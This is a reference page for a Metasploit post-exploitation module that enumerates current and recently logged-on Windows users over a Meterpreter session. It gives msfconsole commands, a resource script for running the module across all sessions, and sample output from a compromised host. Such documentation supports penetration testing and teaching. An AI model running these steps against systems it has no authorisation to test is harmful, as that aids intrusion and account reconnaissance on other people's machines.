Windows Gather Logged On User Enumeration (Registry) - Metasploit


This page contains detailed information about how to use the post/windows/gather/enum_logged_on_users metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Logged On User Enumeration (Registry)
Module: post/windows/gather/enum_logged_on_users
Source code: modules/post/windows/gather/enum_logged_on_users.rb
Disclosure date: -
Last modification time: 2017-07-24 06:26:21 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module will enumerate current and recently logged on Windows users

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/enum_logged_on_users

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users) > show options
    ... show and set options ...
msf post(enum_logged_on_users) > set SESSION session-id
msf post(enum_logged_on_users) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/enum_logged_on_users")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This module will enumerate current and recently logged on Windows users.

Verification Steps


  1. Start msfconsole
  2. Get meterpreter session
  3. Do: use post/windows/gather/enum_logged_on_users
  4. Do: set SESSION <session id>
  5. Do: run

Options


CURRENT

Enumerate currently logged on users. Default: true

RECENT

Enumerate Recently logged on users. Default: true

SESSION

The session to run this module on.

Scenarios


Windows 7 (6.1 Build 7601, Service Pack 1).

  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.10:49196) at 2019-12-13 04:36:54 -0700

  msf exploit(multi/handler) > use post/windows/gather/enum_logged_on_users
  msf post(windows/gather/enum_logged_on_users) > set SESSION 1
    SESSION => 1
  msf post(windows/gather/enum_logged_on_users) > run

  [*] Running against session 1

    Current Logged Users
    ====================

    SID                                            User
    ---                                            ----
    S-1-5-21-3113421791-4205713440-112141152-1000  TEST-PC\TEST


    [+] Results saved in: /root/.msf4/loot/20191213054456_default_192.168.1.10_host.users.activ_424278.txt

    Recently Logged Users
    =====================

    SID                                            Profile Path
    ---                                            ------------
    S-1-5-18                                       %systemroot%\system32\config\systemprofile
    S-1-5-19                                       C:\Windows\ServiceProfiles\LocalService
    S-1-5-20                                       C:\Windows\ServiceProfiles\NetworkService
    S-1-5-21-3113421791-4205713440-112141152-1000  C:\Users\TEST


    [*] Post module execution completed

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/enum_logged_on_users post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/enum_logged_on_users

msf6 post(windows/gather/enum_logged_on_users) > show info

       Name: Windows Gather Logged On User Enumeration (Registry)
     Module: post/windows/gather/enum_logged_on_users
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  CURRENT  true             yes       Enumerate currently logged on users
  RECENT   true             yes       Enumerate Recently logged on users
  SESSION                   yes       The session to run this module on.

Description:
  This module will enumerate current and recently logged on Windows 
  users

Module Options


This is a complete list of options available in the windows/gather/enum_logged_on_users post exploitation module:

msf6 post(windows/gather/enum_logged_on_users) > show options

Module options (post/windows/gather/enum_logged_on_users):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CURRENT  true             yes       Enumerate currently logged on users
   RECENT   true             yes       Enumerate Recently logged on users
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/enum_logged_on_users post exploitation module:

msf6 post(windows/gather/enum_logged_on_users) > show advanced

Module advanced options (post/windows/gather/enum_logged_on_users):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/enum_logged_on_users module can do:

msf6 post(windows/gather/enum_logged_on_users) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/enum_logged_on_users post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/enum_logged_on_users) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • Carlos Perez <carlos_perez[at]darkoperator.com>

Version


This page has been produced using Metasploit Framework version 6.1.41-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.